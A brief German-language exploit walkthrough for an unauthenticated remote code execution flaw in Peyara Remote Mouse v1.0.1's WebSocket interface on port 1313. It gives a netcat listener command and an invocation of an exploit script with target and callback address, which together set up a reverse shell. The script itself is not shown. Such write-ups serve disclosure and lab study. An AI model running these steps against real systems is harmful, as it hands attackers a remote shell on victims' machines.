
Peyara Remote Mouse v1.0.1- Remote Code Execution (RCE)
Peyara Remote Mouse v1.0.1 enthält eine nicht authentifizierte Schwachstelle zur Remote-Code-Ausführung in der WebSocket-Befehlsschnittstelle (Port 1313). Die Anwendung validiert oder bereinigt simulierte Tastatureingabebefehle, die über WebSocket-Verbindungen empfangen werden, nicht, sodass Angreifer bösartige Tastaturereignisse verketten können, die beliebige Systembefehle ausführen. Diese Schwachstelle kann remote ohne Authentifizierung ausgenutzt werden, um das gesamte System zu kompromittieren.
Installieren der anfälligen Anwendung
Laden Sie Peyara Remote Mouse herunter und installieren Sie es auf dem Windows-Zielsystem.
Netcat-Listener starten
Öffnen Sie ein Terminal und führen Sie aus:
nc -nlvp 4444
Exploit-Skript ausführen
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

